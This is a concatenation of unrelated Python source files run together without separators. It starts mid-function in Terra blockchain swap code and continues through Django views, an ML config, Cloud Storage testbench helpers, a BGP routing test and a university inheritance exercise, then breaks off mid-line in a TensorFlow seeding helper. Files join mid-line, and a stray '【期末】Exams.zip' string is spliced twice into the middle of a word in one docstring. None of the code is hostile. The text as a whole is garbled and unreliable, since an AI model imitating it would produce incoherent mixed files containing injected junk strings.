gas_prices=Coins(self.gas_prices), gas_adjustment='1.4', sequence=sequence ) result = self.terra.tx.broadcast(tx) def token_swap(self, pool, amount, sellinfo, belief_price, max_spread=0.5): # Get reference to wallet res = self.request_updated_gas_prices() terra = LCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") wallet = terra.wallet(self.mk) seq = wallet.sequence() account_number = wallet.account_number() gp = self.gas_prices.get(sellinfo['native_token']['denom'])+sellinfo['native_token']['denom'] # print("account_number") # print(account_number) swp = { "swap": { "max_spread": max_spread, "offer_asset": { "info": sellinfo, "amount": str(amount) }, "belief_price": belief_price } } print(swp) swap = MsgExecuteContract( sender=wallet.key.acc_address, contract=pool, execute_msg=swp, coins=Coins.from_str(str(amount)+''+sellinfo['native_token']['denom']), ) print(swap) print('dynamic gas: ',gp) tx = wallet.create_and_sign_tx( msgs=[swap], gas_prices=gp, gas_adjustment='1.4', sequence = seq ) print(tx) return terra.tx.broadcast(tx)diegojromerolopez/djanbansrc/djanban/apps/multiboards/views/multiboards.py # -*- coding: utf-8 -*- from __future__ import unicode_literals, absolute_import import hashlib import time from datetime import timedelta import pydenticon from django.conf import settings from django.contrib.auth.decorators import login_required from django.core.files.base import ContentFile from django.core.urlresolvers import reverse from django.db.models import Q from django.http import HttpResponseRedirect from django.http.response import Http404, HttpResponse from django.shortcuts import render, get_object_or_404 from djanban.apps.base.auth import user_is_member, get_user_boards, user_is_visitor from djanban.apps.base.decorators import member_required from djanban.apps.boards.forms import EditBoardForm, NewBoardForm, NewListForm, LabelForm, EditListForm from djanban.apps.boards.models import List, Board, Label from djanban.apps.boards.stats import avg, std_dev from djanban.apps.fetch.fetchers.trello.boards import Initializer, BoardFetcher from djanban.apps.multiboards.forms import MultiboardForm, DeleteMultiboardForm, LeaveMultiboardForm from djanban.apps.multiboards.models import Multiboard from djanban.utils.week import get_week_of_year, get_weeks_of_year_since_one_year_ago @member_required def view_list(request): return _view_list(request, archived=False) @member_required def view_archived_list(request): return _view_list(request, archived=True) def _view_list(request, archived): member = request.user.member multiboards = member.multiboards.filter(is_archived=archived).order_by("order", "name") replacements = {"multiboards": multiboards, "archived": archived, "member": member} return render(request, "multiboards/list.html", replacements) # New multiboard @member_required def new(request): member = request.user.member multiboard = Multiboard(creator=member) if request.method == "POST": form = MultiboardForm(request.POST, instance=multiboard) if form.is_valid(): form.save(commit=True) return HttpResponseRedirect(reverse("multiboards:list")) else: form = MultiboardForm(instance=multiboard) return render(request, "multiboards/new.html", {"form": form, "member": member}) # View a multiboard @member_required def view(request, multiboard_id): member = request.user.member try: multiboard = member.multiboards.get(id=multiboard_id, is_archived=False) except Multiboard.DoesNotExist: raise Http404 replacements = { "multiboard": multiboard, "member": member, "members": multiboard.members.all(), "boards": multiboard.boards.filter(is_archived=False).order_by("name") } return render(request, "multiboards/view.html", replacements) # View a multiboard's task board @member_required def view_task_board(request, multiboard_id): member = request.user.member try: multiboard = member.multiboards.get(id=multiboard_id, is_archived=False) except Multiboard.DoesNotExist: raise Http404 replacements = { "multiboard": multiboard, "member": member, "boards": multiboard.boards.filter(is_archived=False).order_by("name") } return render(request, "multiboards/view_task_board.html", replacements) # Edition of multiboard @member_required def edit(request, multiboard_id): member = request.user.member try: multiboard = member.created_multiboards.get(id=multiboard_id) except Multiboard.DoesNotExist: raise Http404 if request.method == "POST": form = MultiboardForm(request.POST, instance=multiboard) if form.is_valid(): form.save(commit=True) return HttpResponseRedirect(reverse("multiboards:list")) else: form = MultiboardForm(instance=multiboard) return render(request, "multiboards/edit.html", {"form": form, "multiboard": multiboard, "member": member}) # Delete a multiboard @member_required def delete(request, multiboard_id): member = request.user.member try: multiboard = member.created_multiboards.get(id=multiboard_id) except Multiboard.DoesNotExist: raise Http404 if request.method == "POST": form = DeleteMultiboardForm(request.POST) if form.is_valid() and form.cleaned_data.get("confirmed"): multiboard.delete() return HttpResponseRedirect(reverse("multiboards:list")) else: form = DeleteMultiboardForm() return render(request, "multiboards/delete.html", {"form": form, "multiboard": multiboard, "member": member}) # Leave a multiboard @member_required def leave(request, multiboard_id): member = request.user.member try: multiboard = member.multiboards.get(id=multiboard_id) except Multiboard.DoesNotExist: raise Http404 if member.id == multiboard.creator.id: return render(request, "multiboards/leave.html", {"multiboard": multiboard, "member": member}) if request.method == "POST": form = LeaveMultiboardForm(request.POST) if form.is_valid() and form.cleaned_data.get("confirmed"): multiboard.members.remove(member) return HttpResponseRedirect(reverse("multiboards:list")) else: form = LeaveMultiboardForm() return render(request, "multiboards/leave.html", {"form": form, "multiboard": multiboard, "member": member}) #!/usr/bin/env python from os.path import abspath, dirname, join as pjoin import zipfile SRC_DIR = dirname(abspath(__file__)) with zipfile.ZipFile('add_mesh_SpaceshipGenerator.zip', 'w', zipfile.ZIP_DEFLATED) as arch: for filename in [ '__init__.py', 'spaceship_generator.py', 'textures/hull_normal.png', 'textures/hull_lights_emit.png', 'textures/hull_lights_diffuse.png']: arch.write(pjoin(SRC_DIR, filename), 'add_mesh_SpaceshipGenerator/'+filename) print('created file: add_mesh_SpaceshipGenerator.zip') _base_ = [ '../_base_/models/swin_transformer/large_384.py', '../_base_/datasets/cub_bs8_384.py', '../_base_/schedules/cub_bs64.py', '../_base_/default_runtime.py' ] # model settings checkpoint = 'https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin-large_3rdparty_in21k-384px.pth' # noqa model = dict( type='ImageClassifier', backbone=dict( init_cfg=dict( type='Pretrained', checkpoint=checkpoint, prefix='backbone')), head=dict(num_classes=200, )) paramwise_cfg = dict( norm_decay_mult=0.0, bias_decay_mult=0.0, custom_keys={ '.absolute_pos_embed': dict(decay_mult=0.0), '.relative_position_bias_table': dict(decay_mult=0.0) }) optimizer = dict( _delete_=True, type='AdamW', lr=5e-6, weight_decay=0.0005, eps=1e-8, betas=(0.9, 0.999), paramwise_cfg=paramwise_cfg) optimizer_config = dict(grad_clip=dict(max_norm=5.0), _delete_=True) log_config = dict(interval=20) # log every 20 intervals checkpoint_config = dict( interval=1, max_keep_ckpts=3) # save last three checkpoints import unittest from sultan.config import Settings class TestSettings(unittest.TestCase): def setUp(self): self.settings = Settings() def test_default_settings_loaded(self): self.assertEqual(self.settings.HALT_ON_ERROR, True) def test_log_format(self): self.assertEqual(self.settings.LOG_FORMAT, '%(log_color)s[%(name)s]: %(message)s') def test_log_colors(self): self.assertEqual(self.settings.LOG_COLORS, { 'DEBUG': 'cyan', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'bold_red', })#!/usr/bin/env python # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Standalone helpers for the Google Cloud Storage test bench.""" import base64 import error_response import hashlib import json import random import re import socket import struct import time def validate_bucket_name(bucket_name): """Return True if bucket_name is a valid bucket name. Bucket naming requirements are described in: https://cloud.google.com/storage/docs/naming Note that this function does not verify domain bucket names: https://cloud.google.com/storage/docs/domain-name-verification :param bucket_name:str the name to validate. :rtype: bool """ valid = True if "." in bucket_name: valid &= len(bucket_name) <= 222 valid &= all([len(part) <= 63 for part in bucket_name.split(".")]) else: valid &= len(bucket_name) <= 63 valid &= re.match("^[a-z0-9][a-z0-9._\\-]+[a-z0-9]$", bucket_name) is not None valid &= not bucket_name.startswith("goog") valid &= re.search("g[0o][0o]g[1l][e3]", bucket_name) is None valid &= ( re.match("^[0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}$", bucket_name) is None ) return valid def canonical_entity_name(entity): """Convert entity names to their canonical form. Some entities (notably project--) have more than one name, for example the project-owners- entities are called project-owners- internally. This function :param entity:str convert this entity to its canonical name. :return: the name in canonical form. :rtype:str """ if entity == "allUsers" or entity == "allAuthenticatedUsers": return entity if entity.startswith("project-owners-"): entity = "project-owners-123456789" if entity.startswith("project-editors-"): entity = "project-editors-123456789" if entity.startswith("project-viewers-"): entity = "project-viewers-123456789" return entity.lower() def index_acl(acl): """Return a ACL as a dictionary indexed by the 'entity' values of the ACL. We represent ACLs as lists of dictionaries, that makes it easy to convert them to JSON objects. When changing them though, we need to make sure there is a single element in the list for each `entity` value, so it is convenient to convert the list to a dictionary (indexed by `entity`) of dictionaries. This function performs that conversion. :param acl:list of dict :return: the ACL indexed by the entity of each entry. :rtype:dict """ # This can be expressed by a comprehension but turns out to be less # readable in that form. indexed = dict() for e in acl: indexed[e["entity"]] = e return indexed def filter_fields_from_response(fields, response): """Format the response as a JSON string, using any filtering included in the request. :param fields:str the value of the `fields` parameter in the original request. :param response:dict a dictionary to be formatted as a JSON string. :return: the response formatted as a string. :rtype:str """ if fields is None: return json.dumps(response) tmp = {} # TODO(#1037) - support full filter expressions for key in fields.split(","): if key in response: tmp[key] = response[key] return json.dumps(tmp) def filtered_response(request, response): """Format the response as a JSON string, using any filtering included in the request. :param request:flask.Request the original HTTP request. :param response:dict a dictionary to be formatted as a JSON string. :return: the response formatted as a string. :rtype:str """ fields = request.args.get("fields") return filter_fields_from_response(fields, response) def raise_csek_error(code=400): msg = "Missing a SHA256 hash of the encryption key, or it is not" msg += " base64 encoded, or it does not match the encryption key." link = "https://cloud.google.com/storage/docs/encryption#customer-supplied_encryption_keys" error = { "error": { "errors": [ { "domain": "global", "reason": "customerEncryptionKeySha256IsInvalid", "message": msg, "extendedHelp": link, } ], "code": code, "message": msg, } } raise error_response.ErrorResponse(json.dumps(error), status_code=code) def validate_customer_encryption_headers( key_header_value, hash_header_value, algo_header_value ): """Verify that the encryption headers are internally consistent. :param key_header_value: str the value of the x-goog-*-key header :param hash_header_value: str the value of the x-goog-*-key-sha256 header :param algo_header_value: str the value of the x-goog-*-key-algorithm header :rtype: NoneType """ try: if algo_header_value is None or algo_header_value != "AES256": raise error_response.ErrorResponse( "Invalid or missing algorithm %s for CSEK" % algo_header_value, status_code=400, ) key = base64.standard_b64decode(key_header_value) if key is None or len(key) != 256 / 8: raise_csek_error() h = hashlib.sha256() h.update(key) expected = base64.standard_b64encode(h.digest()).decode("utf-8") if hash_header_value is None or expected != hash_header_value: raise_csek_error() except error_response.ErrorResponse: # error_response.ErrorResponse indicates that the request was invalid, just pass # that exception through. raise except Exception: # Many of the functions above may raise, convert those to an # error_response.ErrorResponse with the right format. raise_csek_error() def json_api_patch(original, patch, recurse_on=set({})): """Patch a dictionary using the JSON API semantics. Patches are applied using the following algorithm: - patch is a dictionary representing a JSON object. JSON `null` values are represented by None). - For fields that are not in `recursive_fields`: - If patch contains {field: None} the field is erased from `original`. - Otherwise `patch[field]` replaces `original[field]`. - For fields that are in `recursive_fields`: - If patch contains {field: None} the field is erased from `original`. - If patch contains {field: {}} the field is left untouched in `original`, note that if the field does not exist in original this means it is not created. - Otherwise patch[field] is treated as a patch and applied to `original[field]`, potentially creating the new field. :param original:dict the dictionary to patch :param patch:dict the patch to apply. Elements pointing to None are removed, other elements are replaced. :param recurse_on:set of strings, the names of fields for which the patch is applied recursively. :return: the updated dictionary :rtype:dict """ tmp = original.copy() for key, value in patch.items(): if value is None: tmp.pop(key, None) elif key not in recurse_on: tmp[key] = value elif len(value) != 0: tmp[key] = json_api_patch(original.get(key, {}), value) return tmp def extract_media(request): """Extract the media from a flask Request. To avoid race conditions when using greenlets we cannot perform I/O in the constructor of GcsObjectVersion, or in any of the operations that modify the state of the service. Because sometimes the media is uploaded with chunked encoding, we need to do I/O before finishing the GcsObjectVersion creation. If we do this I/O after the GcsObjectVersion creation started, the the state of the application may change due to other I/O. :param request:flask.Request the HTTP request. :return: the full media of the request. :rtype: str """ if request.environ.get("HTTP_TRANSFER_ENCODING", "") == "chunked": return request.environ.get("wsgi.input").read() return request.data def corrupt_media(media): """Return a randomly modified version of a string. :param media:bytes a string (typically some object media) to be modified. :return: a string that is slightly different than media. :rtype: str """ # Deal with the boundary condition. if not media: return bytearray(random.sample("abcdefghijklmnopqrstuvwxyz", 1), "utf-8") return b"B" + media[1:] if media[0:1] == b"A" else b"A" + media[1:] # Define the collection of Buckets indexed by GCS_BUCKETS = dict() def lookup_bucket(bucket_name): """Lookup a bucket by name in the global collection. :param bucket_name:str the name of the Bucket. :return: the bucket matching the name. :rtype:GcsBucket :raises:ErrorResponse if the bucket is not found. """ bucket = GCS_BUCKETS.get(bucket_name) if bucket is None: raise error_response.ErrorResponse( "Bucket %s not found" % bucket_name, status_code=404 ) return bucket def has_bucket(bucket_name): """Return True if the bucket already exists in the global collection.""" return GCS_BUCKETS.get(bucket_name) is not None def insert_bucket(bucket_name, bucket): """Insert (or replace) a new bucket into the global collection. :param bucket_name:str the name of the bucket. :param bucket:GcsBucket the bucket to insert. """ GCS_BUCKETS[bucket_name] = bucket def delete_bucket(bucket_name): """Delete a bucket from the global collection.""" GCS_BUCKETS.pop(bucket_name) def all_buckets(): """Return a key,value iterator for all the buckets in the global collection. :rtype:dict[str, GcsBucket] """ return GCS_BUCKETS.items() # Define the collection of GcsObjects indexed by /o/ GCS_OBJECTS = dict() def lookup_object(bucket_name, object_name): """Lookup an object by name in the global collection. :param bucket_name:str the name of the Bucket that contains the object. :param object_name:str the name of the Object. :return: tuple the object path and the object. :rtype: (str,GcsObject) :raises:ErrorResponse if the object is not found. """ object_path, gcs_object = get_object(bucket_name, object_name, None) if gcs_object is None: raise error_response.ErrorResponse( "Object %s in %s not found" % (object_name, bucket_name), status_code=404 ) return object_path, gcs_object def get_object(bucket_name, object_name, default_value): """Find an object in the global collection, return a default value if not found. :param bucket_name:str the name of the Bucket that contains the object. :param object_name:str the name of the Object. :param default_value:GcsObject the default value returned if the object is not found. :return: tuple the object path and the object. :rtype: (str,GcsObject) """ object_path = bucket_name + "/o/" + object_name return object_path, GCS_OBJECTS.get(object_path, default_value) def insert_object(object_path, value): """Insert an object to the global collection.""" GCS_OBJECTS[object_path] = value def delete_object(object_path): """Delete an object from the global collection.""" GCS_OBJECTS.pop(object_path) def all_objects(): """Return a key,value iterator for all the objects in the global collection. :rtype:dict[str, GcsBucket] """ return GCS_OBJECTS.items() def parse_part(multipart_upload_part): """Parse a portion of a multipart breaking out the headers and payload. :param multipart_upload_part:str a portion of the multipart upload body. :return: a tuple with the headers and the payload. :rtype: (dict, str) """ headers = dict() index = 0 next_line = multipart_upload_part.find(b"\r\n", index) while next_line != index: header_line = multipart_upload_part[index:next_line] key, value = header_line.split(b": ", 2) # This does not work for repeated headers, but we do not expect # those in the testbench. headers[key.decode("utf-8")] = value.decode("utf-8") index = next_line + 2 next_line = multipart_upload_part.find(b"\r\n", index) return headers, multipart_upload_part[next_line + 2 :] def parse_multi_part(request): """Parse a multi-part request :param request:flask.Request multipart request. :return: a tuple with the resource, media_headers and the media_body. :rtype: (dict, dict, str) """ content_type = request.headers.get("content-type") if content_type is None or not content_type.startswith("multipart/related"): raise error_response.ErrorResponse( "Missing or invalid content-type header in multipart upload" ) _, _, boundary = content_type.partition("boundary=") if boundary is None: raise error_response.ErrorResponse( "Missing boundary (%s) in content-type header in multipart upload" % boundary ) boundary = bytearray(boundary, "utf-8") marker = b"--" + boundary + b"\r\n" body = extract_media(request) parts = body.split(marker) # parts[0] is the empty string, `multipart` should start with the boundary # parts[1] is the JSON resource object part, with some headers resource_headers, resource_body = parse_part(parts[1]) # parts[2] is the media, with some headers media_headers, media_body = parse_part(parts[2]) end = media_body.find(b"\r\n--" + boundary + b"--\r\n") if end == -1: raise error_response.ErrorResponse( "Missing end marker (--%s--) in media body" % boundary ) media_body = media_body[:end] resource = json.loads(resource_body) return resource, media_headers, media_body def reset_connection(request): client = request.environ["CUSTOM_CONNECTION"] client.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) client.close() raise BaseException("Forced a connect reset.") #!/usr/bin/python import argparse import subprocess as sub from datetime import datetime import time def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('process',type=str, help='the name of the process to track') parser.add_argument('-o','--output',type=str,default='', help='filename of the log') parser.add_argument('-s','--sleep',type=int,default=10, help='sleep time per cycle, in seconds') return parser.parse_args() # Determine the list of process ID's (PID) that belong to processes # by a given name def get_pids(process): try: output = sub.check_output(['pgrep','-f', process]).split(b'\n') pidlist = [ x.decode('utf-8') for x in output] except sub.CalledProcessError: pidlist = [] #print 'list of PIDs = ' + ', '.join(str(e) for e in pidlist) return pidlist # use the python script "ps_mem" to determine the exact about of RAM # being used by a given process in Bytes. def get_raw_mem(pid): try: #print(pid) mem = sub.check_output(['sudo','ps_mem', '-p', pid, '-t']).decode('utf-8') except sub.CalledProcessError: mem = '-1' return mem # Start an ongoing process that tracks RAM usage # of any processes with a given name "process" # and stores the results to a logfile. # Continues indefinitely until the process dies. def monitor_process(process,output='',sleep=10): if len(output)==0: output = '{p}_mem.log'.format(p=process) print(output) quit=False with open(output, 'a', buffering=1) as f: while not quit: pids = get_pids(process) if 0 == len(pids): quit=True print('Process '+ process + ' no longer exists!' ) return None msg = datetime.now().strftime("%m/%d/%Y,%H:%M:%S") + \ " "+pids[0]+" "+str(get_raw_mem(pids[0])) #print(msg) f.write(msg+'\n') time.sleep(sleep) def main(): args = parse_args() #sub.Popen(['pgrep', args.process]) #sudo pgrep -f neo4j monitor_process(args.process, args.output, args.sleep) if __name__ == "__main__": main() 0 #!/usr/bin/env python # # Copyright (c) 2021 by # <> # # Permission to use, copy, modify, and/or distribute this software # for any purpose with or without fee is hereby granted, provided # that the above copyright notice and this permission notice appear # in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY # DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, # WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE # OF THIS SOFTWARE. # """ Test if 172.16.255.254/32 tagged with BLACKHOLE community is not re-advertised downstream outside local AS. """ import os import sys import json import pytest import functools CWD = os.path.dirname(os.path.realpath(__file__)) sys.path.append(os.path.join(CWD, "../")) # pylint: disable=C0413 from lib import topotest from lib.topogen import Topogen, TopoRouter, get_topogen from lib.common_config import step pytestmark = [pytest.mark.bgpd] def build_topo(tgen): for routern in range(1, 5): tgen.add_router("r{}".format(routern)) switch = tgen.add_switch("s1") switch.add_link(tgen.gears["r1"]) switch.add_link(tgen.gears["r2"]) switch = tgen.add_switch("s2") switch.add_link(tgen.gears["r2"]) switch.add_link(tgen.gears["r3"]) switch = tgen.add_switch("s3") switch.add_link(tgen.gears["r2"]) switch.add_link(tgen.gears["r4"]) def setup_module(mod): tgen = Topogen(build_topo, mod.__name__) tgen.start_topology() router_list = tgen.routers() for i, (rname, router) in enumerate(router_list.items(), 1): router.load_config( TopoRouter.RD_ZEBRA, os.path.join(CWD, "{}/zebra.conf".format(rname)) ) router.load_config( TopoRouter.RD_BGP, os.path.join(CWD, "{}/bgpd.conf".format(rname)) ) tgen.start_router() def teardown_module(mod): tgen = get_topogen() tgen.stop_topology() def test_bgp_blackhole_community(): tgen = get_topogen() if tgen.routers_have_failure(): pytest.skip(tgen.errors) def _bgp_converge(): output = json.loads( tgen.gears["r2"].vtysh_cmd("show ip bgp 172.16.255.254/32 json") ) expected = {"paths": [{"community": {"list": ["blackhole", "noExport"]}}]} return topotest.json_cmp(output, expected) def _bgp_no_advertise_ebgp(): output = json.loads( tgen.gears["r2"].vtysh_cmd( "show ip bgp neighbor r2-eth1 advertised-routes json" ) ) expected = { "advertisedRoutes": {}, "totalPrefixCounter": 0, "filteredPrefixCounter": 0, } return topotest.json_cmp(output, expected) def _bgp_no_advertise_ibgp(): output = json.loads( tgen.gears["r2"].vtysh_cmd( "show ip bgp neighbor r2-eth2 advertised-routes json" ) ) expected = { "advertisedRoutes": {"172.16.255.254/32": {}}, "totalPrefixCounter": 2, } return topotest.json_cmp(output, expected) test_func = functools.partial(_bgp_converge) success, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5) assert result is None, 'Failed bgp convergence in "{}"'.format(tgen.gears["r2"]) step("Check if 172.16.255.254/32 is not advertised to eBGP peers") test_func = functools.partial(_bgp_no_advertise_ebgp) success, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5) assert ( result is None ), 'Advertised blackhole tagged prefix to eBGP peers in "{}"'.format( tgen.gears["r2"] ) step("Check if 172.16.255.254/32 is advertised to iBGP peers") test_func = functools.partial(_bgp_no_advertise_ibgp) success, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5) assert ( result is None ), 'Withdrawn blackhole tagged prefix to iBGP peers in "{}"'.format( tgen.gears["r2"] ) if __name__ == "__main__": args = ["-s"] + sys.argv[1:] sys.exit(pytest.main(args)) CS/CSC148/exercises/ex2/ex2.py """CSC148 Exercise 2: Inheritance and Introduction to Stacks === CSC148 Fall 2016 === , , and Department of Computer Science, University of Toronto === Module description === This file contains starter code for Exercise 2. It is divided into two parts: - Task 1, which contai【期末】Exams.zip【期末】Exams.zipns a set of classes that build on your work from last week - Task 2, which contains the skeleton of a simple function involving a Stack data structure. Notes: 1. When you override a method, you generally do not need to include a method docstring, unless there are subclass-specific details to describe. While PyCharm will complain about a missing docstring, you may ignore this warning *for this specific case*. 2. A lot of starter code has been provided! Read through it carefully before starting. You may also find it interesting to compare our work against what you did for Exercise 1. """ # You will find these imports useful. Please do not import any others, # or python_ta will deduct marks. from math import sqrt # sqrt used to calculate diagonal distances import random # used to generate random numbers ############################################################################## # Task 1: Cars and other vehicles ############################################################################## class SuperDuperManager: """A class responsible for keeping track of all cars in the system. """ # @param dict[str, Vehicle] _vehicles: # A map of unique string identifiers to the corresponding vehicles. # For example, _vehicles['a01'] would be a vehicle corresponding to # the id_ 'a01'. def __init__(self): """Initialize a new SuperDuperManager. Initially there are no vehicles in the system. @param SuperDuperManager self: @rtype: None """ self._vehicles = {} def add_vehicle(self, vehicle_type, id_, fuel): """Add a new vehicle to the system of the given type. The new vehicle is identified by the string , and has initial amount of fuel . Do nothing if there is already a vehicle with the given id. Precondition: is one of 'Car', 'Helicopter', or 'UnreliableMagicCarpet'. @param SuperDuperManager self: @param str vehicle_type: @param str id_: @param int fuel: @rtype: None """ # Check to make sure the identifier isn't already used. if id_ not in self._vehicles: if vehicle_type == 'Car': self._vehicles[id_] = Car(fuel) elif vehicle_type == 'Helicopter': self._vehicles[id_] = Helicopter(fuel) elif vehicle_type == 'UnreliableMagicCarpet': self._vehicles[id_] = UnreliableMagicCarpet(fuel) def move_vehicle(self, id_, new_x, new_y): """Move a vehicle with the given id. The vehicle called should be moved to position (, ). Do nothing if there is no vehicle with the given id, or if the corresponding vehicle does not have enough fuel to move. @param SuperDuperManager self: SuperDuperManager @param str id_: @param int new_x: @param int new_y: @rtype: None """ if id_ in self._vehicles: self._vehicles[id_].move(new_x, new_y) def get_vehicle_position(self, id_): """Return the position of the vehicle with the given id. Return a tuple of the (x, y) position of the vehicle. Return None if there is no vehicle with the given id. @param SuperDuperManager self: SuperDuperManager @param str id_: str @rtype: (int, int) | None """ if id_ in self._vehicles: return self._vehicles[id_].position def get_vehicle_fuel(self, id_): """Return the amount of fuel of the vehicle with the given id. Return None if there is no vehicle with the given id. @param SuperDuperManager self: @param str id_: @rtype: int | None """ if id_ in self._vehicles: return self._vehicles[id_].fuel class Vehicle: """ A superclass for a vehicle in the Super Duper system. Note that this interface specifies *two* public attributes, and *two* public methods (the constructor is not considered public). Of the public methods, a default implementation is given for move, but not fuel_needed. It also defines a constructor that should be called by each of its subclasses. === Attributes === @param tuple(int) position: The position of this vehicle. @param int fuel: The amount of fuel remaining for this vehicle. === Representation invariants === fuel >= 0 """ def __init__(self, new_fuel, new_position): """Initialize a new Vehicle with the given fuel and position. Precondition: new_fuel >= 0 @param Vehicle self: Vehicle itself @param int new_fuel: fuel amount @param (int, int) new_position: destination coordinates @rtype: None """ self.fuel = new_fuel self.position = new_position def fuel_needed(self, new_x, new_y): """Return how much fuel would be used to move to the given position. Note: the amount returned may be larger than self.fuel, indicating that this vehicle may not move to the given position. @param Vehicle self: Vehicle itself @param int new_x: destination's x coordinate @param int new_y: destination's y coordinate @rtype: float """ raise NotImplementedError def move(self, new_x, new_y): """Move this vehicle to a new position. Do nothing if this vehicle does not have enough fuel to move. @param Vehicle self: Vehicle itself @param int new_x: destination's x coordinate @param int new_y: destination's y coordinate @rtype: None """ needed = self.fuel_needed(new_x, new_y) if needed <= self.fuel: self.position = (new_x, new_y) self.fuel -= needed # TODO: Implement this class (you can use your work from Exercise 1) class Car(Vehicle): """A Car in the Super Duper system. Car original position is at (0, 0). A Car can only move vertically and horizontally, and uses one unit of fuel per unit distance travelled. Do nothing if the Car does not have enough fuel to move. === Attributes === @param tuple(int) position: The position of this Car. @param int fuel: The amount of fuel remaining for this Car. === Representation invariants === fuel >= 0 """ def __init__(self, fuel, position=(0, 0)): """ Initialize a new Car with the given fuel and position. Precondition: new_fuel >= 0 @param Car self: Car itself. @param int fuel: fuel amount. @param (int, int) position: original position. @rtype: None """ Vehicle.__init__(self, fuel, position) def fuel_needed(self, new_x, new_y): """Return how much fuel would be used to move to the given position. Note: the amount returned may be larger than self.fuel, indicating that this Car may not move to the given position. @param Car self: Car itself. @param int new_x: destination's x coordinate @param int new_y: destination's y coordinate @rtype: float """ distance = abs(new_x - self.position[0]) + abs(new_y - self.position[1]) return distance # TODO: Implement this class. Note: We've imported the sqrt function for you. class Helicopter(Vehicle): """ A helicopter. Can travel diagonally between points. Hlicopter original position is (3, 5). After each move, amount of fuel will round down to the nearest integer. Do nothing if Helicopter does not have enough fuel to move. === Attributes === @param tuple(int) position: The position of this vehicle. @param int fuel: The amount of fuel remaining for this vehicle. === Representation invariants === fuel >= 0 """ def __init__(self, fuel, position=(3, 5)): """ Create a Helicopter with fuel amount and default position Precondition: new_fuel >= 0 @param Car self: Helicopter itself. @param int fuel: fuel amount. @param (int, int) position: original position. @rtype: None """ Vehicle.__init__(self, fuel, position) def fuel_needed(self, new_x, new_y): """Return how much fuel would be used to move to the given position. Note: the amount returned may be larger than self.fuel, indicating that this vehicle may not move to the given position. @param Helicopter self: Helicopter itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: float """ return sqrt((abs(new_x - self.position[0]))**2 + (abs(new_y - self.position[1]))**2) def move(self, new_x, new_y): """Move this Helicopter to a new position. Do nothing if this Helicopter does not have enough fuel to move. @param Helicopter self: Helicopter itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: None """ needed = self.fuel_needed(new_x, new_y) if needed <= self.fuel: self.position = (new_x, new_y) self.fuel = int(self.fuel - needed) # TODO: Implement this class. Note: We've imported the random module for you. class UnreliableMagicCarpet(Vehicle): """ An unreliable magic carpet. An UnreliableMagicCarpet is created at random position (x, y), range of x is integer between 0 to 10 inclusively, range of y is integer between 0 to 10 inclusively too. Does not need to use fuel to travel, but ends up in a random position within two horizontal and vertical units from the target destination. === Attributes === @param tuple(int) position: The position of this vehicle. @param int fuel: The amount of fuel remaining for this vehicle. """ def __init__(self, fuel, position=(random.randint(0, 10), random.randint(0, 10))): """ Create a Helicopter with fuel amount and default position """ Vehicle.__init__(self, fuel, position) def fuel_needed(self, new_x, new_y): """ Return how much fuel would be used to move to the given position. Note: the amount returned always be 0 since UnreliableMagicCarpet does not consume fuel. @param UnreliableMagicCarpet self: UnreliableMagicCarpet itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: int """ return 0 def move(self, new_x, new_y): """ Move this UnreliableMagicCarpet to a new position. Note: The UnreliableMagicCarpet will move to random position around taiget one. @param UnreliableMagicCarpet self: UnreliableMagicCarpet itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: None """ needed = self.fuel_needed(new_x, new_y) if needed <= self.fuel: dx = random.randint(-2, 2) dy = random.randint(-2, 2) self.position = (new_x + dx, new_y + dy) ############################################################################## # Task 2: Introduction to Stacks ############################################################################## def reverse_top_two(stack): """Reverse the top two elements on . Precondition: has at least two items. @param Stack stack: @rtype: None >>> from obfuscated_stack import Stack >>> stack = Stack() >>> stack.add(1) >>> stack.add(2) >>> reverse_top_two(stack) >>> stack.remove() 1 >>> stack.remove() 2 """ # TODO: implement this function after you've read about Stacks. top_1 = stack.remove() top_2 = stack.remove() stack.add(top_1) stack.add(top_2) if __name__ == '__main__': # Run python_ta to ensure this module passes all checks for # code inconsistencies and forbidden Python features. # Useful for debugging! import python_ta python_ta.check_all(config='pylint.txt') # Uncomment and run before final submission. This checks for style errors # in addition to code inconsistencies and forbidden Python features. # python_ta.check_all(config='pylint.txt') import fbuild.builders.scala def build(ctx): scala = fbuild.builders.scala.Builder(ctx) lib = scala.build_lib('lib.jar', ['world.scala']) ctx.logger.log(' * running script.scala:') scala.run_script('script.scala', classpaths=[lib]) exe = scala.build_lib('exe.jar', ['compiled.scala'], classpaths=[lib]) ctx.logger.log(' * running %s:' % exe) scala.run_class('HelloWorld', classpaths=[lib, exe]) import os import random # https://github.com/NVIDIA/framework-determinism os.environ['TF_DETERMINISTIC_OPS'] = '1' import numpy as np import tensorflow as tf def set_seeds(my_seed=42): os.environ['PYTHONHASHSEED'] = 